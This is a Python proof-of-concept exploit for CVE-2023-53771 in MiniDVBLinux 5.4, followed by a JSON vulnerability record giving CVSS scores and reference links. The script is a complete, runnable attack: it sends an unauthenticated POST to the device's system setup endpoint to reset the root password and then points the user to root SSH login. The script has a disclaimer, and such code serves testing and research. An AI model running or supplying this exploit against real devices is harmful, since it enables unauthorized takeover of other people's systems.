CVE-2023-53771

#!/usr/bin/env python3 """ CVE-2023-53771 PoC - MiniDVBLinux 5.4 Unauthenticated Root Password Reset Note: This PoC is for educational and authorized testing purposes only. """ import requests import sys def exploit_minidvblinux(target_ip, new_password): """ Exploit function to reset root password without authentication. Args: target_ip: Target MiniDVBLinux device IP address new_password: New root password to set Returns: bool: True if exploitation appears successful, False otherwise """ target_url = f"http://{target_ip}/cgi-bin/system_setup" # Construct the malicious POST request with SYSTEM_PASSWORD parameter payload = { "SYSTEM_PASSWORD": new_password, "ACTION": "save", "section": "security" } headers = { "User-Agent": "Mozilla/5.0 (compatible; MiniDVB-Client/1.0)", "Content-Type": "application/x-www-form-urlencoded" } try: print(f"[*] Sending password reset request to {target_url}") print(f"[*] Target: {target_ip}") print(f"[*] New password: {new_password}") # Send the crafted POST request without authentication response = requests.post(target_url, data=payload, headers=headers, timeout=10) if response.status_code == 200: print("[+] Request sent successfully") print("[+] Root password may have been reset") print(f"[+] You can now try to SSH with root:{new_password}") return True else: print(f"[-] Unexpected response code: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False if __name__ == "__main__": if len(sys.argv) != 3: print("Usage: python3 cve-2023-53771.py <target_ip> <new_password>") sys.exit(1) target = sys.argv[1] password = sys.argv[2] exploit_minidvblinux(target, password)

{"cve": {"id": "CVE-2023-53771", "sourceIdentifier": "[email protected]", "published": "2025-12-09T21:15:52.310", "lastModified": "2025-12-19T19:21:12.783", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MiniDVBLinux 5.4 contains an authentication bypass vulnerability that allows remote attackers to change the root password without authentication. Attackers can send crafted POST requests to the system setup endpoint with modified SYSTEM_PASSWORD parameters to reset root credentials."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:minidvblinux:minidvblinux:*:*:*:*:*:*:*:*", "versionEndIncluding": "5.4", "matchCriteriaId": "2D9CAD03-85CC-41CC-B745-371250902E61"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/51094", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.minidvblinux.de", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/minidvblinux-unauthenticated-root-password-change-via-system-setup", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5715.php", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}